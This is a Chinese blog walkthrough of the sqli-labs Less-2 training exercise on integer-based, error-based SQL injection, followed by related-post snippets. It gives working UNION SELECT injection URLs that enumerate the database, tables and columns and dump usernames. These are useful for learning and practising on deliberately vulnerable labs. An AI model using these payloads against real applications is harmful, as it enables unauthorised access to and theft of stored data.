【SQLI-Lab】-Less2

最新推荐文章于 2023-05-28 15:49:22 发布
最新推荐文章于 2023-05-28 15:49:22 发布
阅读量285 收藏 1
点赞数
分类专栏: sqli 漏洞注入通关宝典 文章标签: 渗透测试 mysql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xinyue9966/article/details/112972869
版权

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

前言

一、GET整型(数字型)注入

执行数据库查询,并在回显点展示。
用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。

二、步骤

通过报错判断类型和闭合

http://192.168.135.149/sqli/Less-2/?id=1'

在这里插入图片描述

进一步查看回显

http://192.168.135.149/sqli/Less-2/?id=1 and 1=1 -- 1

在这里插入图片描述

发现存在注入点

http://192.168.135.149/sqli/Less-2/?id=1 and 1=2 -- 1

在这里插入图片描述

判断列数

http://192.168.135.149/sqli/Less-2/?id=1 group by 3 -- 1

在这里插入图片描述

爆库名payload

http://192.168.135.149/sqli/Less-2/?id=-1 union select 1,database(),3 -- 1

在这里插入图片描述
爆表名payload

http://192.168.135.149/sqli/Less-2/?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3 -- 1

在这里插入图片描述

爆列名payload

http://192.168.135.149/sqli/Less-2/?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users"),3 --+

在这里插入图片描述

爆username列的数据值payload

http://192.168.135.149/sqli/Less-2/?id=-1 union select 1,(select group_concat(`username`) from security.users),3 -- 1

在这里插入图片描述

总结

整型(数字型)不用注意符号闭合,故意报错看是否在外部成功闭合,即可明确整型(数字型),即正常输入语句即可成功查询。

幸运之河
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
【2day】sqli-labs靶场,重生之第二关开始无敌
zadaSS的博客
10-20 1134
2day渗透学习
sql-labs SQL注入平台——第二关Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
Onlyone_1314的博客
05-28 1638
只返回了2、3说明,后端从数据库中执行SQL语句select 1,2,3;只在前端显示了第2、3个字段,所以我们能看到的就只有第2、3个字段,就要把注入点放在第2、3个位置上。查询id为0的用户肯定是没有返回结果的,这样返回的就只有union联合查询的第二个查询 select 1,2,3;得到security数据库中的表emails,referers,uagents,users。返回结果错误:没有第4列数据,说明只存在三列数据。查询,返回结果按照前4列数据排序。(3)查询当前数据库的名称。
sqli-lab教程——Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
luosaierdadi的博客
07-06 201
输入单引号,根据报错信息确定咱们输入的内容被原封不动的带入到数据库中,也可叫做数字型注入,就是,把第一题中id=1后面的单引号去掉,其它保持不变就行了。
sqli-labs-less-2完整教程
yzcn
10-22 1754
Less-2 开始判断是否存在漏洞: http://127.0.0.1/sqli-labs-master/Less-2/?id=1 显示成功 http://127.0.0.1/sqli-labs-master/Less-2/?id=1’ 显示失败,错误:’’ LIMIT 0,1’,表示在左边多了一个单引号, http://127.0.0.1/sqli-labs-master/Less-2/?id=1’ --+ 进行注释后还是错误 http://127.0.0.1/sqli-labs-master
sqli-libs————Less2(数字型注入)
Fly_鹏程万里
05-08 1196
Less2同样,我们根据提示传入参数id,数据类型为numeric加入单引号进行测试:出错误提示信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' ...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
sqli-lab操作详解
07-12
本篇文章将详细讲解SQL注入漏洞以及如何在`sqli-lab`这个实践环境中进行操作。 一、SQL注入的理解 SQL注入的基本原理是利用程序对用户输入数据的不当处理,使得恶意SQL代码能够与服务器上的数据库交互。当Web应用未...
sqli-libs less1(union 字符注入)
weixin_42728957的博客
12-10 267
打开后,提示输入id并赋值 1、寻找注入点 输入?id=1返回数据,输入?id=1’报错,说明存在sql注入漏洞 根据报错信息,猜想输入参数的值被放到一对单引号之间。 猜测后台源码中存在类似于如下的数据库查询语句(可查看后台源码证实猜测): SELECT * FROM users WHERE id='$id' LIMIT 0,1 2、order by 查询该数据表中的字段数量 输入?id=1’ order by 3 --+ 正常; 输入?id=1’ order by 4 --+ 报错,说明该数据表中字
sqli-lab教程Less-2
Brucye
03-23 294
less-1 sqli-lab通过各种方式(整型注入,字符注入,布尔盲注,时间盲注,堆叠注入…)出库表字段拿到字段值。 学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例) 查字段:select column_name
Sqli-Labs之less-2
ISNS的博客
02-05 971
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~
sqli-lab 学习记录less2
qq_43677324的博客
03-16 257
sqli-lab 学习记录less2 less2 1.我们先来判断这次的sql注入类型 我们输入 ?id=1 ?id=1' 发现第一个语句返回正确 但是第二个却有了报错 我们因此可以判断 这次的sql注入类型为数字类型 2. 之后和less1一样 我们进行暴表的名字(暴表) 我们输入 ?id=0 union select 1,group_concat(table_name),3 from inf...
Sqli-labs less 2
weixin_34175509的博客
08-11 119
Less-2 将'(单引号)添加到数字中。 我们又得到了一个Mysql返回的错误,提示我们语法错误。 YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear''LIMIT...
sqli靶场通关之less2
sunxueer的博客
07-15 445
sqli靶场 less2 方法一:union联合查询 1. 求闭合字符 id=1 //无异常 id=1 and 1 =1 -- + //正确显示 id=1 and 1 =2 -- + //错误 说明有可能存在数字型SQL注入 2. 求列数 id=1 order by 3 -- + id=1 order by 4 -- + 说明有3列 3. 求显示位 id=-1 union select 1,2,3 -- + 4. 数据库名 id=1 and 1=2 union select 1,
mysql less2_Sqli labs系列-less-2 详细篇
weixin_39941792的博客
02-02 84
就今天晚上一个小插曲,瞬间感觉我被嘲讽了。SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊。。。好歹我也是上打过网络安全攻防平台,注入卡在第七关,我下玩过 web_for_pentester ,web渗透靶机2pentester_II_i386,这些靶场的小菜比。。。好了,不扯了,现在开始扯这...
sqli-lab 闯关教程 Less-2
羽路星尘的博客
10-26 179
每天一个注入小实验,过程仅供参考,如有建议或指正欢迎留言,对本文风格的建议也可以留在评论区哟。
sqli_lab(less1-10)解题方法
weixin_43952190的博客
07-19 389
GET注入 less1: ?id=1’ #报错 ?id=1’ and 1=1–+ #正常 ?id=1’ and 1=2–+ #语句正常但返回异常 ?id=1’ order by 3–+ #正常 ?id=-1’ union select 1,2,3–+ #2为显示位 ?id=-1’ union select 1,group_concat(schema_name),3, from information_schema.schemata–+ ?id=-1’
sqli-lab安装
09-05
2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:https://github.com/Audi-1/sqli-labs 。 3. 将下载的代码解压缩到您的Web服务器的根目录下。 4. 创建一个MySQL数据库,并导入提供的SQL文件。您可以...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值